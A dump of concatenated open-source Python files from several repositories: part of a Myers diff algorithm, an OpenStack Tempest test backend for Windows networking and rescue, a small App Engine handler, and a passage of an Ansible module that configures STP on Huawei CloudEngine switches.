# There's nothing to process or yield. Bail.
return
a_line = b_line = 0
last_group = None
# Go through the entire set of lines on both the old and new files
while a_line < self.a_data.length or b_line < self.b_data.length:
a_start = a_line
b_start = b_line
if a_line < self.a_data.length and \
not self.a_data.modified.get(a_line, False) and \
b_line < self.b_data.length and \
not self.b_data.modified.get(b_line, False):
# Equal
a_changed = b_changed = 1
tag = "equal"
a_line += 1
b_line += 1
else:
# Deleted, inserted or replaced
# Count every old line that's been modified, and the
# remainder of old lines if we've reached the end of the new
# file.
while (a_line < self.a_data.length and
(b_line >= self.b_data.length or
self.a_data.modified.get(a_line, False))):
a_line += 1
# Count every new line that's been modified, and the
# remainder of new lines if we've reached the end of the old
# file.
while (b_line < self.b_data.length and
(a_line >= self.a_data.length or
self.b_data.modified.get(b_line, False))):
b_line += 1
a_changed = a_line - a_start
b_changed = b_line - b_start
assert a_start < a_line or b_start < b_line
assert a_changed != 0 or b_changed != 0
if a_changed == 0 and b_changed > 0:
tag = "insert"
elif a_changed > 0 and b_changed == 0:
tag = "delete"
elif a_changed > 0 and b_changed > 0:
tag = "replace"
if a_changed != b_changed:
if a_changed > b_changed:
a_line -= a_changed - b_changed
elif a_changed < b_changed:
b_line -= b_changed - a_changed
a_changed = b_changed = min(a_changed, b_changed)
if last_group and last_group[0] == tag:
last_group = (tag,
last_group[1], last_group[2] + a_changed,
last_group[3], last_group[4] + b_changed)
else:
if last_group:
yield last_group
last_group = (tag, a_start, a_start + a_changed,
b_start, b_start + b_changed)
if not last_group:
last_group = ("equal", 0, self.a_data.length,
0, self.b_data.length)
yield last_group
def _gen_diff_data(self):
"""
Generate all the diff data needed to return opcodes or the diff ratio.
This is only called once during the liftime of a MyersDiffer instance.
"""
if self.a_data and self.b_data:
return
self.a_data = self.DiffData(self._gen_diff_codes(self.a, False))
self.b_data = self.DiffData(self._gen_diff_codes(self.b, True))
self._discard_confusing_lines()
self.max_lines = (self.a_data.undiscarded_lines +
self.b_data.undiscarded_lines + 3)
vector_size = (self.a_data.undiscarded_lines +
self.b_data.undiscarded_lines + 3)
self.fdiag = [0] * vector_size
self.bdiag = [0] * vector_size
self.downoff = self.upoff = self.b_data.undiscarded_lines + 1
self._lcs(0, self.a_data.undiscarded_lines,
0, self.b_data.undiscarded_lines,
self.minimal_diff)
self._shift_chunks(self.a_data, self.b_data)
self._shift_chunks(self.b_data, self.a_data)
def _gen_diff_codes(self, lines, is_modified_file):
"""
Converts all unique lines of text into unique numbers. Comparing
lists of numbers is faster than comparing lists of strings.
"""
codes = []
linenum = 0
if is_modified_file:
interesting_lines = self.interesting_lines[1]
else:
interesting_lines = self.interesting_lines[0]
for line in lines:
# TODO: Handle ignoring/triming spaces, ignoring casing, and
# special hooks
raw_line = line
stripped_line = line.lstrip()
if self.ignore_space:
# We still want to show lines that contain only whitespace.
if len(stripped_line) > 0:
line = stripped_line
interesting_line_name = None
try:
code = self.code_table[line]
interesting_line_name = \
self.interesting_line_table.get(code, None)
except KeyError:
# This is a new, unrecorded line, so mark it and store it.
self.last_code += 1
code = self.last_code
self.code_table[line] = code
# Check to see if this is an interesting line that the caller
# wants recorded.
if stripped_line:
for name, regex in self.interesting_line_regexes:
if regex.match(raw_line):
interesting_line_name = name
self.interesting_line_table[code] = name
break
if interesting_line_name:
interesting_lines[interesting_line_name].append((linenum,
raw_line))
codes.append(code)
linenum += 1
return codes
def _find_sms(self, a_lower, a_upper, b_lower, b_upper, find_minimal):
"""
Finds the Shortest Middle Snake.
"""
down_vector = self.fdiag # The vector for the (0, 0) to (x, y) search
up_vector = self.bdiag # The vector for the (u, v) to (N, M) search
down_k = a_lower - b_lower # The k-line to start the forward search
up_k = a_upper - b_upper # The k-line to start the reverse search
odd_delta = (down_k - up_k) % 2 != 0
down_vector[self.downoff + down_k] = a_lower
up_vector[self.upoff + up_k] = a_upper
dmin = a_lower - b_upper
dmax = a_upper - b_lower
down_min = down_max = down_k
up_min = up_max = up_k
cost = 0
max_cost = max(256, self._very_approx_sqrt(self.max_lines * 4))
while True:
cost += 1
big_snake = False
if down_min > dmin:
down_min -= 1
down_vector[self.downoff + down_min - 1] = -1
else:
down_min += 1
if down_max < dmax:
down_max += 1
down_vector[self.downoff + down_max + 1] = -1
else:
down_max -= 1
# Extend the forward path
for k in range(down_max, down_min - 1, -2):
tlo = down_vector[self.downoff + k - 1]
thi = down_vector[self.downoff + k + 1]
if tlo >= thi:
x = tlo + 1
else:
x = thi
y = x - k
old_x = x
# Find the end of the furthest reaching forward D-path in
# diagonal k
while (x < a_upper and y < b_upper and
(self.a_data.undiscarded[x] ==
self.b_data.undiscarded[y])):
x += 1
y += 1
if odd_delta and up_min <= k <= up_max and \
up_vector[self.upoff + k] <= x:
return x, y, True, True
if x - old_x > self.SNAKE_LIMIT:
big_snake = True
down_vector[self.downoff + k] = x
# Extend the reverse path
if up_min > dmin:
up_min -= 1
up_vector[self.upoff + up_min - 1] = self.max_lines
else:
up_min += 1
if up_max < dmax:
up_max += 1
up_vector[self.upoff + up_max + 1] = self.max_lines
else:
up_max -= 1
for k in range(up_max, up_min - 1, -2):
tlo = up_vector[self.upoff + k - 1]
thi = up_vector[self.upoff + k + 1]
if tlo < thi:
x = tlo
else:
x = thi - 1
y = x - k
old_x = x
while (x > a_lower and y > b_lower and
(self.a_data.undiscarded[x - 1] ==
self.b_data.undiscarded[y - 1])):
x -= 1
y -= 1
if (not odd_delta and down_min <= k <= down_max and
x <= down_vector[self.downoff + k]):
return x, y, True, True
if old_x - x > self.SNAKE_LIMIT:
big_snake = True
up_vector[self.upoff + k] = x
if find_minimal:
continue
# Heuristics courtesy of GNU diff.
#
# We check occasionally for a diagonal that made lots of progress
# compared with the edit distance. If we have one, find the one
# that made the most progress and return it.
#
# This gives us better, more dense chunks, instead of lots of
# small ones often starting with replaces. It also makes the output
# closer to that of GNU diff, which more people would expect.
if cost > 200 and big_snake:
ret_x, ret_y, best = self._find_diagonal(
down_min, down_max, down_k, 0,
self.downoff, down_vector,
lambda x: x - a_lower,
lambda x: a_lower + self.SNAKE_LIMIT <= x < a_upper,
lambda y: b_lower + self.SNAKE_LIMIT <= y < b_upper,
lambda i, k: i - k,
1, cost)
if best > 0:
return ret_x, ret_y, True, False
ret_x, ret_y, best = self._find_diagonal(
up_min, up_max, up_k, best, self.upoff,
up_vector,
lambda x: a_upper - x,
lambda x: a_lower < x <= a_upper - self.SNAKE_LIMIT,
lambda y: b_lower < y <= b_upper - self.SNAKE_LIMIT,
lambda i, k: i + k,
0, cost)
if best > 0:
return ret_x, ret_y, False, True
if (cost >= max_cost and
self.compat_version >= DiffCompatVersion.MYERS_SMS_COST_BAIL):
# We've reached or gone past the max cost. Just give up now
# and report the halfway point between our best results.
fx_best = bx_best = 0
# Find the forward diagonal that maximized x + y
fxy_best = -1
for d in range(down_max, down_min - 1, -2):
x = min(down_vector[self.downoff + d], a_upper)
y = x - d
if b_upper < y:
x = b_upper + d
y = b_upper
if fxy_best < x + y:
fxy_best = x + y
fx_best = x
# Find the backward diagonal that minimizes x + y
bxy_best = self.max_lines
for d in range(up_max, up_min - 1, -2):
x = max(a_lower, up_vector[self.upoff + d])
y = x - d
if y < b_lower:
x = b_lower + d
y = b_lower
if x + y < bxy_best:
bxy_best = x + y
bx_best = x
# Use the better of the two diagonals
if a_upper + b_upper - bxy_best < \
fxy_best - (a_lower + b_lower):
return fx_best, fxy_best - fx_best, True, False
else:
return bx_best, bxy_best - bx_best, False, True
raise Exception("The function should not have reached here.")
def _find_diagonal(self, minimum, maximum, k, best, diagoff, vector,
vdiff_func, check_x_range, check_y_range,
discard_index, k_offset, cost):
for d in range(maximum, minimum - 1, -2):
dd = d - k
x = vector[diagoff + d]
y = x - d
v = vdiff_func(x) * 2 + dd
if v > 12 * (cost + abs(dd)):
if v > best and \
check_x_range(x) and check_y_range(y):
# We found a sufficient diagonal.
k = k_offset
x_index = discard_index(x, k)
y_index = discard_index(y, k)
while (self.a_data.undiscarded[x_index] ==
self.b_data.undiscarded[y_index]):
if k == self.SNAKE_LIMIT - 1 + k_offset:
return x, y, v
k += 1
return 0, 0, 0
def _lcs(self, a_lower, a_upper, b_lower, b_upper, find_minimal):
"""
The divide-and-conquer implementation of the Longest Common
Subsequence (LCS) algorithm.
"""
# Fast walkthrough equal lines at the start
while (a_lower < a_upper and b_lower < b_upper and
(self.a_data.undiscarded[a_lower] ==
self.b_data.undiscarded[b_lower])):
a_lower += 1
b_lower += 1
while (a_upper > a_lower and b_upper > b_lower and
(self.a_data.undiscarded[a_upper - 1] ==
self.b_data.undiscarded[b_upper - 1])):
a_upper -= 1
b_upper -= 1
if a_lower == a_upper:
# Inserted lines.
while b_lower < b_upper:
self.b_data.modified[self.b_data.real_indexes[b_lower]] = True
b_lower += 1
elif b_lower == b_upper:
# Deleted lines
while a_lower < a_upper:
self.a_data.modified[self.a_data.real_indexes[a_lower]] = True
a_lower += 1
else:
# Find the middle snake and length of an optimal path for A and B
x, y, low_minimal, high_minimal = \
self._find_sms(a_lower, a_upper, b_lower, b_upper,
find_minimal)
self._lcs(a_lower, x, b_lower, y, low_minimal)
self._lcs(x, a_upper, y, b_upper, high_minimal)
def _shift_chunks(self, data, other_data):
"""
Shifts the inserts/deletes of identical lines in order to join
the changes together a bit more. This has the effect of cleaning
up the diff.
Often times, a generated diff will have two identical lines before
and after a chunk (say, a blank line). The default algorithm will
insert at the front of that range and include two blank lines at the
end, but that does not always produce the best looking diff. Since
the two lines are identical, we can shift the chunk so that the line
appears both before and after the line, rather than only after.
"""
i = j = 0
i_end = data.length
while True:
# Scan forward in order to find the start of a run of changes.
while i < i_end and not data.modified.get(i, False):
i += 1
while other_data.modified.get(j, False):
j += 1
if i == i_end:
return
start = i
# Find the end of these changes
i += 1
while data.modified.get(i, False):
i += 1
while other_data.modified.get(j, False):
j += 1
while True:
run_length = i - start
# Move the changed chunks back as long as the previous
# unchanged line matches the last changed line.
# This merges with the previous changed chunks.
while start != 0 and data.data[start - 1] == data.data[i - 1]:
start -= 1
i -= 1
data.modified[start] = True
data.modified[i] = False
while data.modified.get(start - 1, False):
start -= 1
j -= 1
while other_data.modified.get(j, False):
j -= 1
# The end of the changed run at the last point where it
# corresponds to the changed run in the other data set.
# If it's equal to i_end, then we didn't find a corresponding
# point.
if other_data.modified.get(j - 1, False):
corresponding = i
else:
corresponding = i_end
# Move the changed region forward as long as the first
# changed line is the same as the following unchanged line.
while i != i_end and data.data[start] == data.data[i]:
data.modified[start] = False
data.modified[i] = True
start += 1
i += 1
while data.modified.get(i, False):
i += 1
j += 1
while other_data.modified.get(j, False):
j += 1
corresponding = i
if run_length == i - start:
break
# Move the fully-merged run back to a corresponding run in the
# other data set, if we can.
while corresponding < i:
start -= 1
i -= 1
data.modified[start] = True
data.modified[i] = False
j -= 1
while other_data.modified.get(j, False):
j -= 1
def _discard_confusing_lines(self):
def build_discard_list(data, discards, counts):
many = 5 * self._very_approx_sqrt(data.length / 64)
for i, item in enumerate(data.data):
if item != 0:
num_matches = counts[item]
if num_matches == 0:
discards[i] = self.DISCARD_FOUND
elif num_matches > many:
discards[i] = self.DISCARD_CANCEL
def scan_run(discards, i, length, index_func):
consec = 0
for j in range(length):
index = index_func(i, j)
discard = discards[index]
if j >= 8 and discard == self.DISCARD_FOUND:
break
if discard == self.DISCARD_FOUND:
consec += 1
else:
consec = 0
if discard == self.DISCARD_CANCEL:
discards[index] = self.DISCARD_NONE
if consec == 3:
break
def check_discard_runs(data, discards):
i = 0
while i < data.length:
# Cancel the provisional discards that are not in the middle
# of a run of discards
if discards[i] == self.DISCARD_CANCEL:
discards[i] = self.DISCARD_NONE
elif discards[i] == self.DISCARD_FOUND:
# We found a provisional discard
provisional = 0
# Find the end of this run of discardable lines and count
# how many are provisionally discardable.
j = i
while j < data.length:
if discards[j] == self.DISCARD_NONE:
break
elif discards[j] == self.DISCARD_CANCEL:
provisional += 1
j += 1
# Cancel the provisional discards at the end and shrink
# the run.
while j > i and discards[j - 1] == self.DISCARD_CANCEL:
j -= 1
discards[j] = 0
provisional -= 1
length = j - i
# If 1/4 of the lines are provisional, cancel discarding
# all the provisional lines in the run.
if provisional * 4 > length:
while j > i:
j -= 1
if discards[j] == self.DISCARD_CANCEL:
discards[j] = self.DISCARD_NONE
else:
minimum = 1 + self._very_approx_sqrt(length / 4)
j = 0
consec = 0
while j < length:
if discards[i + j] != self.DISCARD_CANCEL:
consec = 0
else:
consec += 1
if minimum == consec:
j -= consec
elif minimum < consec:
discards[i + j] = self.DISCARD_NONE
j += 1
scan_run(discards, i, length, lambda x, y: x + y)
i += length - 1
scan_run(discards, i, length, lambda x, y: x - y)
i += 1
def discard_lines(data, discards):
j = 0
for i, item in enumerate(data.data):
if self.minimal_diff or discards[i] == self.DISCARD_NONE:
data.undiscarded[j] = item
data.real_indexes[j] = i
j += 1
else:
data.modified[i] = True
data.undiscarded_lines = j
self.a_data.undiscarded = [0] * self.a_data.length
self.b_data.undiscarded = [0] * self.b_data.length
self.a_data.real_indexes = [0] * self.a_data.length
self.b_data.real_indexes = [0] * self.b_data.length
a_discarded = [0] * self.a_data.length
b_discarded = [0] * self.b_data.length
a_code_counts = [0] * (1 + self.last_code)
b_code_counts = [0] * (1 + self.last_code)
for item in self.a_data.data:
a_code_counts[item] += 1
for item in self.b_data.data:
b_code_counts[item] += 1
build_discard_list(self.a_data, a_discarded, b_code_counts)
build_discard_list(self.b_data, b_discarded, a_code_counts)
check_discard_runs(self.a_data, a_discarded)
check_discard_runs(self.b_data, b_discarded)
discard_lines(self.a_data, a_discarded)
discard_lines(self.b_data, b_discarded)
def _very_approx_sqrt(self, i):
result = 1
i /= 4
while i > 0:
i /= 4
result *= 2
return result
| mit |
stefan-caraiman/cloudbase-init-ci | argus/backends/tempest/cloud.py | 3 | 8574 | # Copyright 2015 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from argus.backends.tempest import tempest_backend
from argus import config as argus_config
from argus import exceptions
from argus import util
with util.restore_excepthook():
from tempest.common import dynamic_creds
from tempest.common import waiters
CONFIG = argus_config.CONFIG
SUBNET6_CIDR = "::ffff:a00:0/120"
DNSES6 = ["::ffff:808:808", "::ffff:808:404"]
class NetworkWindowsBackend(tempest_backend.BaseWindowsTempestBackend):
"""Back-end for providing static network configuration.
Creates an additional internal network which will be
bound explicitly with the new created instance.
"""
def _get_isolated_network(self):
"""Returns the network itself from the isolated network resources.
This works only with the isolated credentials and
this step is achieved by allowing/forcing tenant isolation.
"""
# Extract the just created private network.
return self._manager.primary_credentials().network
def _get_networks(self):
"""Explicitly gather and return the private networks.
All these networks will be attached to the newly created
instance without letting nova to handle this part.
"""
_networks = self._manager.networks_client.list_networks()
try:
_networks = _networks["networks"]
except KeyError:
raise exceptions.ArgusError('Networks not found.')
# Skip external/private networks.
networks = [net["id"] for net in _networks
if not net["router:external"]]
# Put in front the main private network.
head = self._get_isolated_network()["id"]
networks.remove(head)
networks.insert(0, head)
# Adapt the list to a format accepted by the API.
return [{"uuid": net} for net in networks]
def _create_private_network(self):
"""Create an extra private network to be attached.
This network is the one with disabled DHCP and
ready for static configuration by Cloudbase-Init.
"""
tenant_id = self._manager.primary_credentials().tenant_id
# pylint: disable=protected-access
net_resources = self._manager.isolated_creds._create_network_resources(
tenant_id)
# Store the network for later cleanup.
key = "fake"
fake_net_creds = util.get_namedtuple(
"FakeCreds",
("network", "subnet", "router",
"user_id", "tenant_id", "username", "tenant_name"),
net_resources + (None,) * 4)
self._manager.isolated_creds._creds[key] = fake_net_creds
# Disable DHCP for this network to test static configuration and
# also add default DNS name servers.
subnet_id = fake_net_creds.subnet["id"]
subnets_client = self._manager.subnets_client
subnets_client.update_subnet(
subnet_id, enable_dhcp=False,
dns_nameservers=CONFIG.argus.dns_nameservers)
# Change the allocation pool to configure any IP,
# other the one used already with dynamic settings.
allocation_pools = subnets_client.show_subnet(subnet_id)["subnet"][
"allocation_pools"]
allocation_pools[0]["start"] = util.next_ip(
allocation_pools[0]["start"], step=2)
subnets_client.update_subnet(subnet_id,
allocation_pools=allocation_pools)
# Create and attach an IPv6 subnet for this network. Also, register
# it for later cleanup.
subnet6_name = util.rand_name(self.__class__.__name__) + "-subnet6"
network_id = fake_net_creds.network["id"]
subnets_client.create_subnet(
network_id=network_id,
cidr=SUBNET6_CIDR,
name=subnet6_name,
dns_nameservers=DNSES6,
tenant_id=tenant_id,
enable_dhcp=False,
ip_version=6)
def setup_instance(self):
# Just like a normal preparer, but this time
# with explicitly specified attached networks.
if not isinstance(self._manager.isolated_creds,
dynamic_creds.DynamicCredentialProvider):
raise exceptions.ArgusError(
"Network resources are not available."
)
self._create_private_network()
self._networks = self._get_networks()
super(NetworkWindowsBackend, self).setup_instance()
@staticmethod
def _find_ip_address(port, subnet_id):
for fixed_ip in port["fixed_ips"]:
if fixed_ip["subnet_id"] == subnet_id:
return fixed_ip["ip_address"]
def get_network_interfaces(self):
"""Retrieve and parse network details from the compute node."""
ports_client = self._manager.ports_client
networks_client = self._manager.networks_client
subnets_client = self._manager.subnets_client
guest_nics = []
for network in self._networks or []:
network_id = network["uuid"]
net_details = networks_client.show_network(network_id)["network"]
nic = dict.fromkeys(util.NETWORK_KEYS)
for subnet_id in net_details["subnets"]:
details = subnets_client.show_subnet(subnet_id)["subnet"]
# The network interface should follow the format found under
# `windows.InstanceIntrospection.get_network_interfaces`
# method or `argus.util.NETWORK_KEYS` model.
v6switch = details["ip_version"] == 6
v6suffix = "6" if v6switch else ""
nic["dhcp"] = details["enable_dhcp"]
nic["dns" + v6suffix] = details["dns_nameservers"]
nic["gateway" + v6suffix] = details["gateway_ip"]
nic["netmask" + v6suffix] = (
details["cidr"].split("/")[1] if v6switch
else util.cidr2netmask(details["cidr"]))
# Find rest of the details under the ports using this subnet.
# There should be no conflicts because on the current
# architecture every instance is using its own router,
# subnet and network accessible only to it.
ports = ports_client.list_ports()["ports"]
for port in ports:
# Select instance related ports only, with the
# corresponding subnet ID.
if "compute" not in port["device_owner"]:
continue
ip_address = self._find_ip_address(port, subnet_id)
if not ip_address:
continue
nic["mac"] = port["mac_address"].upper()
nic["address" + v6suffix] = ip_address
break
guest_nics.append(nic)
return guest_nics
class RescueWindowsBackend(tempest_backend.BaseWindowsTempestBackend):
"""Instance rescue Windows-based back-end."""
def rescue_server(self):
"""Rescue the underlying instance."""
admin_pass = CONFIG.openstack.image_password
self._manager.servers_client.rescue_server(
self.internal_instance_id(),
adminPass=admin_pass)
waiters.wait_for_server_status(
self._manager.servers_client,
self.internal_instance_id(), 'RESCUE')
def unrescue_server(self):
"""Unrescue the underlying instance."""
self._manager.servers_client.unrescue_server(
self.internal_instance_id())
waiters.wait_for_server_status(
self._manager.servers_client,
self.internal_instance_id(), 'ACTIVE')
| apache-2.0 |
mark-ignacio/phantomjs | src/qt/qtwebkit/Tools/QueueStatusServer/handlers/updatebase.py | 143 | 1902 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from google.appengine.api import users
from google.appengine.ext import webapp, db
class UpdateBase(webapp.RequestHandler):
def _int_from_request(self, name):
string_value = self.request.get(name)
try:
int_value = int(string_value)
return int_value
except ValueError, TypeError:
pass
return None
| bsd-3-clause |
willthames/ansible | lib/ansible/modules/network/cloudengine/ce_stp.py | 39 | 37593 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_stp
version_added: "2.4"
short_description: Manages STP configuration on HUAWEI CloudEngine switches.
description:
- Manages STP configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
state:
description:
- Specify desired state of the resource.
required: false
default: present
choices: ['present', 'absent']
stp_mode:
description:
- Set an operation mode for the current MSTP process.
The mode can be STP, RSTP, or MSTP.
required: false
default: null
choices: ['stp', 'rstp', 'mstp']
stp_enable:
description:
- Enable or disable STP on a switch.
required: false
default: null
choices: ['enable', 'disable']
stp_converge:
description:
- STP convergence mode.
Fast means set STP aging mode to Fast.
Normal means set STP aging mode to Normal.
required: false
default: null
choices: ['fast', 'normal']
bpdu_protection:
description:
- Configure BPDU protection on an edge port.
This function prevents network flapping caused by attack packets.
required: false
default: null
choices: ['enable', 'disable']
tc_protection:
description:
- Configure the TC BPDU protection function for an MSTP process.
required: false
default: null
choices: ['enable', 'disable']
tc_protection_interval:
description:
- Set the time the MSTP device takes to handle the maximum number of TC BPDUs
and immediately refresh forwarding entries.
The value is an integer ranging from 1 to 600, in seconds.
required: false
default: null
tc_protection_threshold:
description:
- Set the maximum number of TC BPDUs that the MSTP can handle.
The value is an integer ranging from 1 to 255. The default value is 1 on the switch.
required: false
default: null
interface:
description:
- Interface name.
If the value is C(all), will apply configuration to all interfaces.
if the value is a special name, only support input the full name.
required: false
default: null
edged_port:
description:
- Set the current port as an edge port.
required: false
default: null
choices: ['enable', 'disable']
bpdu_filter:
description:
- Specify a port as a BPDU filter port.
required: false
default: null
choices: ['enable', 'disable']
cost:
description:
- Set the path cost of the current port.
The default instance is 0.
required: false
default: null
root_protection:
description:
- Enable root protection on the current port.
required: false
default: null
choices: ['enable', 'disable']
loop_protection:
description:
- Enable loop protection on the current port.
required: false
default: null
choices: ['enable', 'disable']
'''
EXAMPLES = '''
- name: CloudEngine stp test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config stp mode"
ce_stp:
state: present
stp_mode: stp
provider: "{{ cli }}"
- name: "Undo stp mode"
ce_stp:
state: absent
stp_mode: stp
provider: "{{ cli }}"
- name: "Enable bpdu protection"
ce_stp:
state: present
bpdu_protection: enable
provider: "{{ cli }}"
- name: "Disable bpdu protection"
ce_stp:
state: present
bpdu_protection: disable
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"bpdu_protection": "enable",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {"bpdu_protection": "disable"}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"bpdu_protection": "enable"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["stp bpdu-protection"]
'''
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec
class Stp(object):
""" Manages stp/rstp/mstp configuration """
def __init__(self, **kwargs):
""" Stp module init """
# module
argument_spec = kwargs["argument_spec"]
self.spec = argument_spec
self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)
# config
self.cur_cfg = dict()
self.stp_cfg = None
self.interface_stp_cfg = None
# module args
self.state = self.module.params['state'] or None
self.stp_mode = self.module.params['stp_mode'] or None
self.stp_enable = self.module.params['stp_enable'] or None
self.stp_converge = self.module.params['stp_converge'] or None
self.interface = self.module.params['interface'] or None
self.edged_port = self.module.params['edged_port'] or None
self.bpdu_filter = self.module.params['bpdu_filter'] or None
self.cost = self.module.params['cost'] or None
self.bpdu_protection = self.module.params['bpdu_protection'] or None
self.tc_protection = self.module.params['tc_protection'] or None
self.tc_protection_interval = self.module.params['tc_protection_interval'] or None
self.tc_protection_threshold = self.module.params['tc_protection_threshold'] or None
self.root_protection = self.module.params['root_protection'] or None
self.loop_protection = self.module.params['loop_protection'] or None
# state
self.changed = False
self.updates_cmd = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def cli_load_config(self, commands):
""" Cli load configuration """
if not self.module.check_mode:
load_config(self.module, commands)
def cli_get_stp_config(self):
""" Cli get stp configuration """
regular = "| include stp"
flags = list()
flags.append(regular)
self.stp_cfg = get_config(self.module, flags)
def cli_get_interface_stp_config(self):
""" Cli get interface's stp configuration """
if self.interface:
regular = "| ignore-case section include ^interface %s$" % self.interface
flags = list()
flags.append(regular)
tmp_cfg = get_config(self.module, flags)
if not tmp_cfg:
self.module.fail_json(
msg='Error: The interface %s is not exist.' % self.interface)
if "undo portswitch" in tmp_cfg:
self.module.fail_json(
msg='Error: The interface %s is not switch mode.' % self.interface)
self.interface_stp_cfg = tmp_cfg
def check_params(self):
""" Check module params """
if self.cost:
if self.cost.isdigit():
if int(self.cost) < 1 or int(self.cost) > 200000000:
self.module.fail_json(
msg='Error: The value of cost is out of [1 - 200000000].')
else:
self.module.fail_json(
msg='Error: The cost is not digit.')
if self.tc_protection_interval:
if self.tc_protection_interval.isdigit():
if int(self.tc_protection_interval) < 1 or int(self.tc_protection_interval) > 600:
self.module.fail_json(
msg='Error: The value of tc_protection_interval is out of [1 - 600].')
else:
self.module.fail_json(
msg='Error: The tc_protection_interval is not digit.')
if self.tc_protection_threshold:
if self.tc_protection_threshold.isdigit():
if int(self.tc_protection_threshold) < 1 or int(self.tc_protection_threshold) > 255:
self.module.fail_json(
msg='Error: The value of tc_protection_threshold is out of [1 - 255].')
else:
self.module.fail_json(
msg='Error: The tc_protection_threshold is not digit.')
if self.root_protection or self.loop_protection or self.cost:
if not self.interface:
self.module.fail_json(
msg='Error: Please input interface.')
elif self.interface == "all":
self.module.fail_json(
msg='Error: Interface can not be all when config root_protection or loop_protection or cost.')
if self.root_protection and self.root_protection == "enable":
if self.loop_protection and self.loop_protection == "enable":
self.module.fail_json(
msg='Error: Can not enable root_protection and loop_protection at the same interface.')
if self.edged_port or self.bpdu_filter:
if not self.interface:
self.module.fail_json(
msg='Error: Please input interface.')
def get_proposed(self):
""" Get module proposed """
self.proposed["state"] = self.state
if self.stp_mode:
self.proposed["stp_mode"] = self.stp_mode
if self.stp_enable:
self.proposed["stp_enable"] = self.stp_enable
if self.stp_converge:
self.proposed["stp_converge"] = self.stp_converge
if self.interface:
self.proposed["interface"] = self.interface
if self.edged_port:
self.proposed["edged_port"] = self.edged_port
if self.bpdu_filter:
self.proposed["bpdu_filter"] = self.bpdu_filter
if self.cost:
self.proposed["cost"] = self.cost
if self.bpdu_protection:
self.proposed["bpdu_protection"] = self.bpdu_protection
if self.tc_protection:
self.proposed["tc_protection"] = self.tc_protection
if self.tc_protection_interval:
self.proposed["tc_protection_interval"] = self.tc_protection_interval
if self.tc_protection_threshold:
self.proposed["tc_protection_threshold"] = self.tc_protection_threshold
if self.root_protection:
self.proposed["root_protection"] = self.root_protection
if self.loop_protection:
self.proposed["loop_protection"] = self.loop_protection
def get_existing(self):
""" Get existing configuration """
self.cli_get_stp_config()
if self.interface and self.interface != "all":
self.cli_get_interface_stp_config()
if self.stp_mode:
if "stp mode stp" in self.stp_cfg:
self.cur_cfg["stp_mode"] = "stp"
self.existing["stp_mode"] = "stp"
elif "stp mode rstp" in self.stp_cfg:
self.cur_cfg["stp_mode"] = "rstp"
self.existing["stp_mode"] = "rstp"
else:
self.cur_cfg["stp_mode"] = "mstp"
self.existing["stp_mode"] = "mstp"
if self.stp_enable:
if "stp disable" in self.stp_cfg:
self.cur_cfg["stp_enable"] = "disable"
self.existing["stp_enable"] = "disable"
else:
self.cur_cfg["stp_enable"] = "enable"
self.existing["stp_enable"] = "enable"
if self.stp_converge:
if "stp converge fast" in self.stp_cfg:
self.cur_cfg["stp_converge"] = "fast"
self.existing["stp_converge"] = "fast"
else:
self.cur_cfg["stp_converge"] = "normal"
